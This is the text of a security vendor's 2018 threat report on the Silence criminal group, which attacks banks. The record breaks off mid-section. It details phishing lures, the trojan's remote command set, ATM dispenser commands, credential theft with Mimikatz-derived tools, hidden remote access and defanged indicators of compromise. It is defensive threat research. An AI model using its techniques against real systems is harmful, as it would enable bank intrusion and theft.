{ "id": "cd43f831-8729-4cf0-9f8e-85738a17ba4b", "created_at": "2026-04-29T08:22:06.156638Z", "updated_at": "2026-04-29T10:41:52.998259Z", "deleted_at": null, "sha1_hash": "600cac4b4fc9a9b6241a9177429d5ea474950633", "title": "Silence: Moving into the darkside", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6078126, "plain_text": "1\r\nSeptember 2018 group-ib.com\r\nMOVING INTO THE DARKSIDE\n\nSilence\r\nMoving into the darkside\r\n2\r\nTABLE OF CONTENTS\r\nIntroduction 4\r\nKey findings 5\r\nSilence is a new threat to banks 5\r\nLanguage 5\r\nThefts 6\r\n Geography 6\r\nTools 7\r\nInitial steps 7\r\nPhishing emails 7\r\nServer infrastructure 8\r\nSilence: the development of tools and types of attacks 9\r\nToolbox 10\r\nSilence 10\r\nAtmosphere 13\r\nUndernet DDoS bot 16\r\nSmoke bot 17\r\nInfection 18\r\nEmails 18\r\nMail servers 21\r\nLateral movement 23\r\nRemote Access 25\r\nTargets 26\r\nAWS CBR 26\r\nATMs 28\r\nCard processing 30\n\n3\r\nHunting СHAPTER IS NOT AVAILABLE\r\nMail servers —\r\nC\u0026C servers —\r\nTechnical description of the tools 32\r\nAttachments 32\r\nSilence Trojan 37\r\nSilence.Downloader 38\r\nPatched Kikothac 40\r\nSilence.MainModule 45\r\nSilence.SurveillanceModule 53\r\nSilence.ProxyBot 54\r\nSilence.ProxyBot.Net 57\r\nSilence ATM pack 60\r\nAtmosphere.Dropper 60\r\nAtmosphere.Injector 62\r\nAtmosphere 62\r\nOther programs 73\r\nUtilities 73\r\nPerl IRC DDoS bot 76\r\nIndicators 81\r\nHashes 81\r\nE-mails 82\r\nIPs 83\r\nDomains 85\r\nFile system artifacts: 86\r\nSuricata rules —\r\nYARA rules —\n\nSilence\r\nMoving into the darkside\r\n4\r\nINTRODUCTION\r\nIn August 2017, the National Bank of Ukraine warned state-owned and private\r\nbanks across the country about a large-scale phishing attack. The threat actor\r\nused an exploit from the arsenal of the state-sponsored hacker group APT28.\r\nHowever, the tool, as Group-IB discovered, was modified to target banks. It also\r\nappeared that the authors of the phishing emails had in-depth knowledge of\r\nreverse engineering.\r\nAt the time, the National Bank of Ukraine linked the attack with a new wave of\r\nNotPetya ransomware outbreak, but these were not pro-government hackers.\r\nInitial impressions would indicate that the targeted attack was on par with the\r\nworks of Cobalt or MoneyTaker. This hypothesis went unproven. On investigation,\r\nthe adversaries were a young and active hacker group, who, like young smart\r\ntechnical specialists, learned very fast and from their own mistakes.\r\nThe new threat actor group was eventually named Silence. They were identified\r\nand named first in reports by Anti-Virus vendors, however, until the publication\r\nof this report, no detailed technical analysis of Silence or their operations has\r\nbeen conducted.\r\nFinancially motivated APT groups which focus efforts on targeted attacks on the\r\nfinancial sector such as — Anunak, Corkow, Buhtrap — usually managed botnets\r\nusing developed or modified banking Trojans. Silence is different. Even at the\r\nbeginning of their journey, in the summer of 2016, Silence was not able to hack\r\nbanking systems and actually seemed to learn on the job by carefully analyzing\r\nthe experiences, tactics and the tools of other groups. They tried new techniques\r\nto steal from banking systems, including AWS CBR (the Russian Central Bank’s\r\nAutomated Workstation Client), ATMs, and card processing.\r\nThis report details the results of our investigation, review of attacks and thefts\r\nby Silence, analysis of their tools, tactics and procedures used to target financial\r\ninstitutions. This report serves as a contribution to the Whitehat Security\r\ncommunity from Group-IB and provides technical descriptions of the methods\r\nand technologies that can be used to detect and track this group. We have\r\nalso included a detailed analysis of the toolset created by Silence indicators of\r\ncompromise and other data for successful detection of Silence's attacks.\r\nSILENCE is a new and active criminal APT-group, who adapt\r\nquickly from their own mistakes and adopt TTPs of other\r\ngroups.\n\nSilence\r\nMoving into the darkside\r\n5\r\nKEY FINDINGS\r\nSilence is a new threat to banks\r\nGroup-IB detected the first incidents relating to Silence in June 2016. At that time,\r\nthe cyber criminals were just beginning to test their capabilities. One of Silence’s\r\nfirst targets was a Russian bank, when they tried to attack AWS CBR. After this, the\r\nhackers \"took a moment of silence\". It was later discovered that this is standard\r\npractice for Silence. They are selective in their attacks and wait for about three\r\nmonths between incidents, which is approximately three times longer than other\r\nfinancially motivated APT groups, like MoneyTaker, Anunak (Carbanak), Buhtrap or\r\nCobalt.\r\nSilence members constantly analyze the experience of other criminal groups. They\r\ntry to apply new techniques and ways of stealing from various banking systems,\r\nincluding AWS CBR, ATMs, and card processing. In a short period of time they\r\nstudied not only direct types of hacking, but also supply-chain attacks. In less\r\nthan a year, the amount of funds stolen by Silence has increased five times.\r\nLanguage\r\nAs with most financially-motivated APT groups, the members of Silence are\r\nRussian speakers, which is evidenced by the language of commands, priorities in\r\nlocating leased infrastructure, the choice of Russian-speaking hosting providers\r\nand location of the targets.\r\n• The commands of Silence’s Trojan are Russian words typed using an English\r\nlayout:\r\nhtrjyytrn \u003e реконнект (reconnect)\r\nhtcnfhn \u003e рестарт (restart)\r\nytnpflfybq \u003e нетзадач (notasks)\r\n• The main targets are located in Russia, although phishing emails were sent to\r\nbank employees in more than 25 countries of Central and Western Europe, Africa\r\nand Asia.\r\n• To rent servers, Silence uses Russian-speaking hosting providers.\n\n6\r\nThefts\r\nTimeline of attacks\r\nJuly 2016 — A failed attempt to withdraw money via the Russian system of\r\ninterbank transactions AWS CBR. Hackers gained access to the system, but the\r\nattack wasn’t successful due to improper preparation of the payment order. The\r\nbank’s employees suspended the transaction and conducted Incident Response\r\nand remediation using their own resources. This resulted in the subsequent\r\nincident described below:\r\nAugust 2016 — Another attempt to attack the same bank. Just one month (!) after\r\ntheir failure with AWS CBR, Silence regained access to the servers of the bank\r\nand attempted another attack. To do this, they downloaded software to secretly\r\ntake screenshots and proceeded to investigate the operator’s work via video\r\nstream. This time, the bank asked Group-IB to respond to the incident. The attack\r\nwas stopped. However, the full log of the incident was unrecoverable, because in\r\nan attempt to clean the network, the bank’s IT team deleted the majority of the\r\nattacker’s traces.\r\nOctober 2017 — The first successful theft by the group that we know about. This\r\ntime, Silence attacked ATMs and stole over $100,000 in just one night. In the same\r\nyear, they conducted DDoS attacks using the Perl IRC bot and public IRC chats to\r\ncontrol Trojans.\r\nAfter the failed attempt with the interbank transactions system in 2016, the\r\ncriminals did not try to withdraw money using the system, even after gaining\r\naccess to the servers of AWS CBR.\r\nFebruary 2018 — Successful attack using card processing. They picked up over\r\n$550,000 via ATMs of the bank’s counterpart.\r\nApril 2018 — In two months, the group returned to their proven method and\r\nwithdrew funds again through ATMs. During a single night they siphoned about\r\n$150,000. This time, the Silence’s tools had been significantly modified: they were\r\nnot burdened with redundant features and ran stably without bugs.\r\nGeography\r\nSilence’s successful attacks currently have been limited to the CIS and Eastern\r\nEuropean countries. Their main targets are located in Russia, Ukraine, Belarus,\r\nAzerbaijan, Poland, and Kazakhstan.\r\nHowever, some phishing emails were sent to bank employees in more than 25\r\ncountries of Central and Western Europe, Africa and Asia including: Kyrgyzstan,\r\nArmenia, Georgia, Serbia, Germany, Latvia, Czech Republic, Romania, Kenya, Israel,\r\nCyprus, Greece, Turkey, Taiwan, Malaysia, Switzerland, Vietnam, Austria, Uzbekistan,\r\nGreat Britain, Hong Kong, and others.\r\n2302\r\n96\r\n67\r\n28\r\n17\r\n10\r\n8\r\n8\r\nRU\r\nCOM\r\nOTHERS\r\nUA\r\nBY\r\nPL\r\nORG\r\nKZ\n\n7\r\nTOOLS\r\nInitial steps\r\nAccording to Group-IB’s Forensics Laboratory, during the the first attacks Silence\r\nused third-party tools and learned on the go. However, after some time they\r\nswitched from using third-party tools to developing their own and significantly\r\nimproved their tactics.\r\nDuring the first operations the cybercriminals used a third-party patched\r\nbackdoor Kikothac without access to its source code. They chose a Trojan, which\r\nhad been known since November 2015, and did not require a lot of time for\r\nreverse engineering and back end implementation.\r\nThe usage of this disassembled backdoor indicates that the group started without\r\npreparation and the first operation was a mere attempt to test their capabilities.\r\n \r\nDevelopment of new tools\r\nLater, the criminals developed a unique set of tools to attack card processing and\r\nATMs. It included self-developed software:\r\n• Silence is a framework for attacks on infrastructure.\r\n• Atmosphere is a set of software for ‘jackpotting’ ATMs.\r\n• Farse is a utility for getting passwords from an infected computer.\r\n• Cleaner is a tool for deleting logs of the remote connection.\r\nBorrowed tools:\r\n• Smoke bot is a bot for conducting the first phase of infection.\r\n• Modified Perl IRC DDoS is a bot based on the Undernet DDoS bot for\r\nconducting DDoS attacks.\r\nPhishing emails\r\nAt the beginning, the group used hacked servers and compromised accounts for\r\ncampaigns, but later the criminals began to register phishing domains and create\r\nself-signed certificates.\r\nTo evade content filtering systems they used DKIM and SPF. To create ‘legitimate’\r\nemails purporting to be from the banks, the hackers used the banks’ domains that\r\ndid not have configured SPF records. The letters were sent from rented servers\r\nwith substituted technical headers. The attackers created lengthy and logical\r\ntexts and sent these with the names of bank employees to increase the success\r\nrate.\n\nSilence\r\nMoving into the darkside\r\n8\r\nThe emails contained decoy Microsoft Office Word documents weaponized with\r\nexploits for the CVE-2017-0199, CVE-2017-11882+CVE-2018-0802, CVE-2017-0262,\r\nand CVE-2018-8174 vulnerabilities. Apart from the exploits, there were emails\r\nwith attached CHM files, which is not common, and .LNK shortcuts launching\r\nPowerShell and JavaScript code\r\nRemote control and persistence\r\nThe Operator usually conducts the attack using a Linux machine with the WinExe\r\nutility (the equivalent of PSExec under Linux), which can launch software on the\r\nremote Windows node via SMB protocol.\r\nAfter it is established on the system, the Silence Trojan installs Meterpreter\r\nstager. To gain access to compromised computers, the cybercriminals use\r\nRAdmin. It is software used by many administrators in banks to remotely control\r\nworkstations.\r\nServer infrastructure\r\nThe servers rented by the attackers to conduct phishing attacks are located in\r\nRussia and the Netherlands. For the C\u0026C servers, they use a Ukrainian hosting\r\nprovider that allows placement of practically any content, including banned\r\ninformation, malicious software and files. Silence rented several servers at\r\nMaxiDed, whose infrastructure was banned by Interpol in May 2018.\n\n9\r\nJUN 2016\r\nUnsuccessful ARM\r\nCBR attack\r\nSEP 2016\r\nSilence.\r\nDownloader\r\nOCT 2017\r\nAtmosphere\r\nAtmosphere.Injector\r\nAtmosphere.Dropper\r\nAPR 2018\r\nATM attack\r\nJUL 2016\r\nSilence.\r\nProxyBot\r\nJUL 2016\r\nSilence.\r\nShadowingModule\r\nAUG 2016\r\nSilence.\r\nProxyBot\r\nJUN 2017\r\nSilence.\r\nMainModule\r\nJAN 2018\r\nSilence\r\nProxyBot.Net\r\nNOV 2016\r\nSilence.\r\nMainModule AUG 2017\r\nSilence.Downloader\r\nSilence.MainModule\r\nMAR 2018\r\nSilence.\r\nProxyBot\r\nOCT 2017\r\nSilence.\r\nProxyBot\r\nMAR 2017\r\nSilence.\r\nProxyBot.Net\r\nNOV 2017\r\nATM attack\r\nFEB 2018\r\nCard Processing attack\r\nJUL 2017\r\nSilence.\r\nMainModule\r\nAPR 2018\r\nAtmosphere\r\nAtmosphere.Dropper\r\nSilence.Downloader\r\nSilence:\r\nthe development of tools and types of attacks\n\nSilence\r\nMoving into the darkside\r\n10\r\nTOOLBOX\r\nAn important feature of Silence group is the use of their unique self-developed\r\ntools. Such tools include:\r\n• Silence, a framework which the group is named after;\r\n• Atmosphere pack, a unique set for attacking ATMs;\r\n• Farse, a utility for getting passwords from the infected computer;\r\n• Cleaner, a tool for deleting logs of the remote connection.\r\nSilence\r\nThe unique Silence framework used by the group is modular. It consists of the\r\nfollowing components (discovered by us; there could be more):\r\n• Silence.Downloader loader;\r\n• Main module called Silence and a patched backdoor called Kikothac;\r\n• Silence.SurveillanceModule, a module for spying on users;\r\n• Silence.ProxyBot proxy.\r\nThe main module can load any other executable file, which does not limit the\r\nsystem’s functionality and gives room to extend features.\r\nAfter the attached exploit, disguised as an MS Office document, is opened the\r\nSilence.Downloader loader for the Trojan is downloaded and installed. The loader\r\nadds itself to startup and waits for the command to download and launch the\r\nnext stage. If the server is of no interest to the attacker, the bot executes a self-destruct command.\r\nDownload \u0026 Execute\r\nShell command\r\nCommand request\r\nResults\r\nRegistration\r\nUsers Silence C\u0026C\r\nEmail with exploit\r\nor script\r\nSilence.\r\nDownloader\r\nSilence or patched\r\nKikothac\r\nMeterpreter\r\nSilence.SurveillanceModule\r\nSilence.ProxyBot\n\n11\r\nThe main body of the Silence Trojan also adds itself to startup after the launch.\r\nThen it registers on the server and enters command reception/execution loop.\r\nThe main task of the Trojan is to execute remote commands in the command\r\ninterpreter as well as download and launch arbitrary programs.\r\nBelow is a table of C\u0026C commands that the malware executes:\r\n \r\nCommand Type of command\r\n/ Russian text\r\nFunction\r\nhtrjyytrn reconnect\r\nреконнект\r\nTerminate the command interpreter\r\nsession, clear all temporary files, connect to\r\nC\u0026C \"from scratch\"\r\nhtcnfhn restart\r\nрестарт\r\nTerminate the command interpreter session\r\nand restart it\r\nytnpflfybq notasks\r\nнетзадач\r\nNo operation\r\n#wget wget Download a file from a remote server and\r\nsave it in the current directory. Accepts two\r\nparameters: URL and file name\r\nshell\\n shell Launch the command interpreter\r\n\\n\u003cany other\r\nstring\u003e\r\nrun Execute an arbitrary OS command using the\r\ncommand interpreter\r\nTo enter standalone segments of a corporate network, Silence downloads\r\nthe ProxyBot module. The purpose of this software is to redirect, through an\r\nSilence.\r\nDownloader\r\nSilence\r\nMainModule\r\nSilence.\r\nProxyBot\r\nSilence\r\nSurveilanceModule\r\nhtrjyytrn\r\nhtcn-n\r\nytnpflfybq\r\n#wget\r\nshell\\n\r\n\\n\u003cany other string\u003e\n\nSilence\r\nMoving into the darkside\r\n12\r\ninfected computer, traffic from the external C\u0026C server to the local nodes of the\r\ncompromised network, which are not accessible from outside. We discovered two\r\nversions of the program: one in Delphi and one in C#.\r\nTo monitor legitimate activity of the victim bank’s users and financial operators,\r\nthe attackers installed SurveillanceModule, which secretly took screenshots to\r\ncombine them into a pseudo stream.\r\nAt the last stage of the attack, the bot installed Meterpreter stager into the\r\nsystem, which automates navigation inside the network.\r\nHaving analyzed the C\u0026C servers we also discovered Kikothac backdoor, which\r\nwas communicating with one of the Silence servers, 46.183.221[.]89. At first, we\r\nthought that the software was not connected to Silence’s activity, but the time of\r\nuploading to the public sandbox HybridAnalysis corresponded with the time of the\r\nSilence attack. Moreover, the Kikothac sample was uploaded with the same name\r\nas the Silence Trojan on VirusTotal:\r\nIP IP\r\n#\r\n# #\r\nnetsrvc32.exe\r\npatched Kikothac\r\napcs.exe\r\nUploded on Hybrid 2016-07-08\r\npatched Kikothac ProxyBot\r\nKikothac uploaded\r\nto VT on 2016-08-09\r\nProxybot\r\nJuly 15th 2016\r\nProxied request\r\nAnswer\r\nCommand\r\nReturns results\r\nRequest command\r\nUsers ProxyBot C\u0026C\n\n13\r\nThrough in-depth analysis, we discovered that the reference to the original\r\naddress of the C\u0026C server was gone, and the code responsible for connecting to\r\nthe server, uses the reference to the address which was written over statically-linked code generated by the compiler:\r\nIn addition, all Kikothac commands begin with the # character, including the\r\ncommand for downloading files from web servers, #wget. The same command is\r\nimplemented in the Silence Trojan. This is the only command there that starts with\r\nthe # character. Any other string not included in the list of Kikothac commands,\r\nis automatically sent to the command interpreter cmd.exe for execution. Silence\r\ndoes the very same thing. For example, let’s look at two Kikothac commands\r\nbelow. The full list of commands is quite long and is provided in the Technical\r\nDescription of the Tools section:\r\nCommand Function\r\n#wget Download the file to an infected device. Bot accepts two\r\nparameters: URL and file name.\r\nAny other string Send the string to cmd.exe.\r\nAs we can see, both commands are used in the Silence Trojan. They duplicate the\r\norder, the type of arguments, and the logic. This suggests that to control patched\r\nKikothac, the threat actors developed back end, which was later used for the\r\nSilence Trojan.\r\nAtmosphere\r\nTo control the ATM dispenser, Silence uses a unique software called Atmosphere.\r\nOver time the Trojan has significantly evolved to address the needs of the\r\ncriminals. For example, the developers have changed the logic of injection into\r\nprocesses and added the flexible injector, which has expanded the list of targeted\r\nATMs. They have also removed the redundant features that interrupted the\r\noperation or were not used by the criminals. For example, the last version of the\r\nsoftware didn’t process commands from the PIN pad and the generated log got\r\nsmaller. In the initial stages, the software was recompiled a lot, which resulted in\r\nseveral unsuccessful cashout attempts.\n\nSilence\r\nMoving into the darkside\r\n14\r\nThe hackers remotely install Atmosphere.Dropper on the ATM. The software\r\ncontains a .DLL library, which is the main body of the Atmosphere Trojan. After\r\nthe body is extracted, the dropper injects the library into the fwmain32.exe\r\nprocess. This enables the threat actor to remotely control the dispenser. In the\r\nfirst versions, there was a way to control the dispenser using the PIN pad, but later\r\nthese features were deleted.\r\nCommand Function\r\n\"B\" Get information on the content of ATM cassettes. In addition, the\r\nstring \"cash units info received\" is added into the log.\r\n\"A\" Get information on the content of ATM cassettes without logging.\r\n\"Q\" Get information on the content of ATM cassettes.\r\n\"D\" One-time withdrawal of notes of the specific face value from the\r\nATM.\r\n\"H\" Suspend all threads in process except its own. Then use functions\r\nGetThreadContext + SetThreadContext to redirect their execution\r\nto its own function.\r\n\"M\", \"R\",\r\n\"S\", \"P\",\r\n\"T\", \"L\"\r\nRecord the output of the last command into the C:\\intel\\\u003cchrs\u003e.007\r\nfile. This command is also executed after any other by default.\r\nDropper\r\nExtracts\r\nInjects into hardcoded\r\nInjects given into specified\r\nInjector Atmosphere Dispenser’s process\n\n15\r\nThe program receives commands via files with the specific extension. The\r\nsoftware reads commands, executes them, and then, as the author intended,\r\nit should overwrite the file with gibberish and delete it to hamper the work for\r\nforensics experts. However, the software logic contains an error, which results in\r\nthe nonsensical text being written at the end of the file instead of over everything.\r\nThis mistake is present in other software used by Silence, which supports the\r\nhypothesis of a single author. For example, the same piece of code is used in the\r\nprogram for clearing the connection logs of RAdmin.\r\nAs part of incident response activities in one of the banks, Group-IB forensic\r\nspecialists discovered about 11 samples of Atmosphere software, compiled at\r\ndifferent times with slight changes. In one of the directories containing the Trojan\r\nwe also discovered scripts for the command interpreter and a separate injector,\r\nwhich accepted a path to the DLL library as an argument, and an identifier of the\r\nprocess where it should inject the library. However, the scripts passed the target\r\nprocess name instead of the process identifier, which resulted in an unsuccessful\r\nattempt to take control over the dispenser.\n\nSilence\r\nMoving into the darkside\r\n16\r\nUndernet DDoS bot\r\nWhile analyzing one of the servers of Silence, we discovered a DDoS bot called\r\nPerl IrcBot. On April 20, 2017, phishing emails were sent from the driley123@\r\nbellsouth[.]net address. The emails contained an exploit, which downloaded\r\nSilence.Downloader with the address of C\u0026C server, 92.222.68[.]32, on a machine.\r\nPerl IrcBot for DDoS attacks was available at hxxp://92.222.68[.]32/bot.pl and\r\nhxxp://92.222.68[.]32/wolf/ until June 18, 2018.\r\nThe program was first mentioned on a Spanish forum in messages dated 2014:\r\nhxxps://forum.voidsec[.]com/thread-93.html. There are also modifications of\r\nthe bot available online at: hxxps://github[.]com/H1R0GH057/Anonymous/blob/\r\nmaster/ircabuse.pl and hxxps://gist.github[.]com/dreadpiratesr/7bccc6eed4\r\n9150a8564a. The version used by Silence is based on the Undernet DDoS Bot\r\n(second link), according to the unique string \"PRIVMSG : 4,1 [Help] 9,1 Undernet\r\nPerlBot Main Help:\".\r\nThis software is controlled using IRC messages. There were two servers used:\r\n1. ira.pubcs16[.]ro, which is a public server of Counter-Strike players via #test\r\nchannel. Later they used #PMA channel;\r\n2. piratesofcyber[.]tk.\r\nIP\r\nhttp\r\nhttp # DNS\r\nhttp # DNS\r\nDNS\r\n#\r\n#\r\n2017-04-20\r\n081ee959cbe6bc7dde7a6d13168e4fb4\r\nShell\r\nuploaded to vt on 2017-09-17\r\nShell\r\nuploaded to vt on 2017-09-17\r\nSilenсe.Downloader\r\ncompiled on 2017-04-19\r\nIRС DDoS bot\r\nDDoS Perl IrcBotV1.0\r\nSpanish v ars\n\n17\r\nSmoke Bot\r\nOne of the English-language emails sent in 2017 contained a JavaScript loader\r\nwhich installed Smoke Bot into the system. Smoke Bot was put up for sale on\r\nunderground forums in 2011. The seller is a Russian-speaking hacker named\r\nSmokeLdr. Apart from downloading and execution of arbitrary files, Smoke Bot has\r\nthe following features:\r\n• collection of credentials from browsers, mail programs and other software;\r\n• collection of email addresses from saved email accounts;\r\n• interception of data input into browser;\r\n• interception of email and FTP passwords in real time;\r\n• ability to collect files with specific criteria;\r\n• DDoS module;\r\n• TeamViewer module;\r\n• cryptocurrency mining module.\n\nSilence\r\nMoving into the darkside\r\n18\r\nINFECTION\r\nEmails\r\nThe infection vector used by Silence is typical: phishing emails with attachments\r\ncontaining exploits or malicious scripts. The senders masquerade as bank\r\nemployees, and while the email lacks design elements (pictures, HTML layout), the\r\ntext is logical and inspires trust. Unlike, for example, Cobalt phishing emails that\r\nare created carelessly and rely on their mass nature, Silence emails are tidy and\r\ntargeted.\r\nFor example, on August 18, 2017, the Central Bank of Ukraine notified\r\nfinancial institutions about an upcoming ransomware attack (https://www.\r\nbankinfosecurity.com/ukraine-central-bank-detects-massive-attack-preparation-a-10209). We believe that the message was the result of a phishing\r\ncampaign by Silence against the banks in Ukraine, Kazakhstan, and Russia.\r\nA unique feature of the campaign is the use of an exploit for the CVE-2017-0262\r\nvulnerability. The exploit is believed to be owned by the state-sponsored hacker\r\ngroup APT28. To conduct the campaign, the hackers used a compromised server.\r\nOn May 9, 2017, ESET published a report on the tools of the APT28 group (https://\r\nwww.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/). The approach to infecting a system and capabilities\r\nof attachment from the Silence email correspond to the published report.\r\nHowever, we discovered the modification of the exploit at the level of assembler\r\ninstructions or so-called byte patching:\n\n19\r\nThis means that the author didn’t have the source code or the builder, so he had\r\nto use a fixed jump address. Therefore, the author had to write the payload to the\r\nfixed address. It is worth noting that to implement such modification one needs\r\nquite advanced expertise in reverse engineering.\r\nLater, there was a campaign with the CHM file. This is a file extension for compiling\r\nWindows reference tools. On October 13, 2017, the attackers used names of several\r\nRussian banks to send phishing emails. One of the emails purported to be from\r\nthe Russian bank Fin Service. For this attack, the criminals registered a domain,\r\nfcbank[.]ru\n\nSilence\r\nMoving into the darkside\r\n20\r\nThis format allows criminals to enable JavaScripts and execute remote VB and/or\r\nPowershell code by calling mshta.exe or powershell.exe.\r\nAlthough the vector is not new and was used even back in 2015 to deliver malware,\r\nthe use of CHM files is not at all typical for attacks on the CIS and, in some cases,\r\nhelps to evade discovery and successfully get through corporate security systems.\r\nOne of the emails was sent to CERT-GIB (Group-IB’s Computer Emergency\r\nResponse Team):\r\nThe attachment contained an archive with a .LNK shortcut, generated in such way\r\nthat when opened it launched the Powershell, which downloaded and launched\r\nSilence.Downloader. The result of launching the attachment from the Silence\r\nemail is the installation of Silence.Downloader on the victim’s computer.\r\nOne of the emails in English contained a JavaScript. The letter purported to be\r\nfrom Royal Bank of Scotland (stated in footer) with the sender \"HBCL inc\" \u003cinfo@\r\nfinamnews019[.]xyz\u003e:\r\nAfter opening the JavaScript the computer downloaded and launched Smoke\r\nBot from the address 91.207.7[.]79, which is a C\u0026C server of Silence. Smoke Bot\r\ndownloaded additional modules from the cassocial[.]gdn and variiform[.]gdn\r\ndomains. The former domain resolved to 91.207.7[.]97. This server, 91.207.7[.]97,\r\nwas used by Silence to download Silence.Downloader in the email with .LNK.\n\n21\r\nMail Servers\r\nTo send malicious emails, the group utilizes hacked servers and registers\r\n\"banking\" domains. They also use public mail services, like mail.com and att.net.\r\nIf a bank whose name is used for a campaign, didn’t have correctly configured SPF\r\nrecords, attackers used a hacked or rented a server to send emails with replaced\r\nheaders. For example, the following servers were used to send emails with the\r\nnames of banks without configured SPF:\r\nIP Real Bank Service\r\nProvider\r\nCountry Date\r\n5.200.55[.]198 bankrab.ru OOO IT-Grad Russia 07-2016\r\n185.7.30[.]137 itbank.ru VMLAB\r\nLLC VPS\r\nCustomers\r\nRussia 06-2017\r\nWhen registering new domains for a server from which the emails will be sent, the\r\nself-signed certificate is released. For more details, please refer to the Hunting\r\nsection. This way, the email passes the DKIM check. The following domain names\r\nwere registered using this method:\r\nDomain IP Service\r\nProvider\r\nCountry Date\r\ntrustintbank[.]org 109.234.34[.]35 VDSINA VDS\r\nHosting\r\nRussia 2016-07\r\nitbank[.]us 193.0.178[.]12 PE Viktor Tyurin Netherlands 2016-07\r\nitrbank[.]ru 31.31.204[.]161 Reg.Ru Russia 2016-09\r\nitmbank[.]ru 185.100.67[.]129 Hoster.KZ Kazakhstan 2016-09\r\nitmbank[.]us 46.30.43[.]83 Eurobyte VPS Russia 2016-09\r\nmosfinbank[.]ru 5.200.56[.]161 OOO IT-Grad 2016-09\r\nmostbbank[.]ru 31.31.204[.]161 Reg.Ru Russia 2016-09\r\n77.246.145[.]86 E-PLANET Russia 2017-06\r\n77.246.145[.]82 2017-06\r\nppfbank[.]ru 185.158.154[.]147 IT-GRAD 1Cloud\r\nLLC\r\nRussia 2017-06\r\nfbank[.]org 185.158.154[.]17 IT-GRAD 1Cloud\r\nLLC\r\nRussia 2017-06\r\n185.154.53[.]132 2017-06\r\ndgbank[.]ru 158.255.0[.]35 Mir Telematiki\r\nLtd\r\nRussia 2017-09\n\nSilence\r\nMoving into the darkside\r\n22\r\nbankci[.]ru 95.142.39[.]5 Eurobyte VDS Russia 2017-09\r\n95.142.39[.]6 Eurobyte VDS Russia 2017-09\r\ncsbank[.]ru 185.180.231[.]63 FirstByte Russia 2017-09\r\nfcbank[.]ru 195.161.41[.]2 Avguro\r\nTechnologies\r\nLtd. Hosting\r\nservice\r\nprovider\r\nRussia 2017-09\r\n81.177.135[.]99 2017-10\r\nmmibank[.]ru 81.177.140[.]58 Avguro\r\nTechnologies\r\nLtd. Hosting\r\nservice\r\nprovider\r\nRussia 2017-09\r\n81.177.6[.]226 2017-10\r\nspas-ibosberbank[.]ru185.235.130[.]69 ON-LINE DATA\r\nLTD\r\nNetherlands 2018-01\r\nfpbank[.]ru 217.28.213[.]250 INTRELL-NET Russia 2018-05\r\n217.28.213[.]162 2018-05\r\n217.29.57[.]176 2018-05\r\nHacked servers used for sending emails:\r\nDomain Date\r\ntvaudio[.]ru 07-2016\r\nvivacity[.]ru 08-2017\r\nfinamnews019[.]xyz 10-2017\n\n23\r\nLATERAL MOVEMENT\r\nApart from malware, Silence uses some well-known legitimate utilities to\r\ncomplete the tasks. For example, to access compromised computers, the group\r\nuses winexe, which is a Linux utility for remote control of Windows-based\r\nmachines via SMB protocol. Winexe is an open source project, which is available at\r\nhttps://sourceforge.net/projects/winexe/.\r\nTo access the machine on Windows with SMB, several conditions must be met:\r\n• active Server Message Block (SMB) service, which is not blocked by firewall;\r\n• active File and Print Sharing service;\r\n• disabled Simple File Sharing service;\r\n• available Admin$ network resource (hidden SMB object).\r\nTo access Admin$ resource, which is used to launch programs, the program has\r\nto have credentials: login and password. Upon successful access to the target\r\nmachine, the c:\\Windows\\winexesvc.exe program is created and launched on the\r\nserver using Winexe.\r\nAfter gaining remote control of the target machine, hackers use Mimikatz-based software and Meterpreter capabilities to download data on user and\r\nadministrator accounts from the domain.\r\nTo get the computer administrator privileges, LPE exploits are required.\r\nIt was confirmed that they used standalone LPE exploits: CVE-2008-4250, CVE-2017-0143, and CVE-2017-0263. Other samples were not recoverable. The group\r\nalso uses all LPE exploits provided by the Metasploit framework.\r\nTo retrieve passwords from RAM, the group used the Farse 6.1 utility, which\r\nis based on the source code of Mimikatz (hxxps://github[.]com/gentilkiwi/\r\nmimikatz). Farse is just an add-on for Mimikatz, which, when launched, extracts\r\ncredentials from lsass.exe and prints them to the standard output. In other\r\nwords, it is software which automates your work with Mimikatz.\n\nSilence\r\nMoving into the darkside\r\n24\r\nFarse is developed by Silence. For detailed technical analysis, please refer to the\r\nTechnical Description of the Tools section.\r\nHackers used NMAP to scan the corporate network. The tool enabled them to\r\nbuild network topology and identify vulnerable hosts, which they used to gain\r\naccess to other machines and administrator accounts.\r\nTo delete RAdmin logs, the group used self-developed software called Cleaner,\r\nwhich overwrites gibberish in the specified file. The software contains a logical\r\nerror and the data is added to the end of the document, not overwritten from the\r\nbeginning. The implementation is copied from Atmosphere.\n\n25\r\nProxied request\r\nAnswer\r\nCommand\r\nReturns results\r\nRequest command\r\nUsers ProxyBot C\u0026C\r\nREMOTE ACCESS\r\nAfter gaining control over the machine (using privilege escalation or a domain\r\nadministrator account), to further control it, hackers install a remote control tool\r\ncalled RAdmin. The software is modified in such a way that it works hidden from\r\nthe user.\r\nAt the same time, together with RAdmin hackers use standard access via RDP.\r\nTo do so, they patch termsrv.dll. In some cases Silence uses access via WEB RDP\r\n(which is a standard Windows service) using HTTPS protocol.\r\nTo access the nodes in an internal corporate network that cannot be accessed\r\nfrom the outside, Silence uses unique software, which allows proxying traffic\r\nwith backconnect. The first software was written in Delphi. It is classified as\r\nSilence.ProxyBot. For a detailed description, please refer to the Technical\r\nDescription of the Tools section. After a while, Silence migrated to the version\r\nof the software for .NET. called Silence.ProxyBot.NET.\r\nThus, any computer becomes a proxy with backconnect and intermediate node for\r\naccessing critical servers in the network.\r\n After thorough investigation of the protocol for interaction with the backconnect\r\nserver, we have developed a software for detecting Silence servers. This data was\r\nused to detect the infrastructure of the criminal group. The algorithm is described\r\nin the Hunting section.\n\nSilence\r\nMoving into the darkside\r\n26\r\nTARGETS\r\nThe first incident related to Silence that we know about happened in July 2016.\r\nHackers tried to withdraw money by manually creating a payment order in the\r\nsystem of interbank transactions, AWS CBR. However, the payment order was\r\ncreated incorrectly. The bank’s employees discovered suspicious activity on time\r\nand took countermeasures using their own resources.\r\nDespite the reaction of the security team and a failed first attempt, the hackers\r\nrecovered access to the servers of this bank and took a second shot in August\r\n2016. For this, they downloaded software for secretly taking screenshots and\r\nproceeded to investigate the operator’s work via a pseudo-video stream.\r\nIn 2017, Silence began to attack ATMs, and this was the first known case of\r\nsuccessful money withdrawal. Over one night, the ATMs of one bank spat out over\r\n$100,000. In the same year, they conducted DDoS 